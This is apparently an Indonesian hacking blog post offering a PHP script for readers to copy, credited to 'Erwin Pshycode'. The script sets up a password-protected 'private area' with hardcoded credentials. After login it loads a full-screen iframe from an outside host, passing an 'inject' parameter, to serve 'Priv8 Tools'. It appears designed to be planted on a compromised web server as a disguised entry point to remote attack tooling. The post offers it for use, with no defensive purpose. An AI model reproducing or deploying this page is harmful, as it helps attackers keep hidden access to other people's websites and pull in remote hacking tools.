GuidePedia

0
    Langung COMOT nih Script Di Bawah :D
    <?php
    session_start();
    set_time_limit(9999999);
    $login='ceker';
    $password='pitek';
    $auth=1;
    $style='<STYLE>BODY{background-color: #000000; background: url(http://img21.imageshack.us/img21/3332/62034070.jpg);color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #121214;font-size: 8pt;color: #C1C1C7;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
        $header='<html><head><link rel="SHORTCUT ICON" href="http://img13.imageshack.us/img13/6793/anarchyj.png"><title>Alecs Private Area</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
        $footer='</body></html>';
        if(@$_POST['action']=="exit")unset($_SESSION['an']);
        if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
        if($_SESSION['an']==0){
        echo $header;
        echo '<br><center><tr><td colspan="2" align="center"><strong>Private Area Login</strong></td></tr><br><br>';
        echo '<table><form method="POST"><tr><td>Username: </td><td><input type="text" name="login" value=""></td></tr><tr><td>Password: </td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
        echo $footer;
        exit;}
        ?>
        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
        <html xmlns="http://www.w3.org/1999/xhtml">
        <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <title>Slackercode Priv8 Tools</title>
        <link rel="shortcut icon" href="http://icons.iconseeker.com/ico/financial/green-dollar.ico" type="image/x-icon">
        </head>
         
        <body>
        <iframe id="content"
                src="http://tempek.asu.su/?inject=slackerc0de" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
          <p>Your browser does not support iframes. Please upgrade to
             <a href="http://getfirefox.com">a modern browser</a>.</p>
        </iframe>
        </body>
        </html>

    Creator:Erwin Pshycode

Post a Comment

 
Top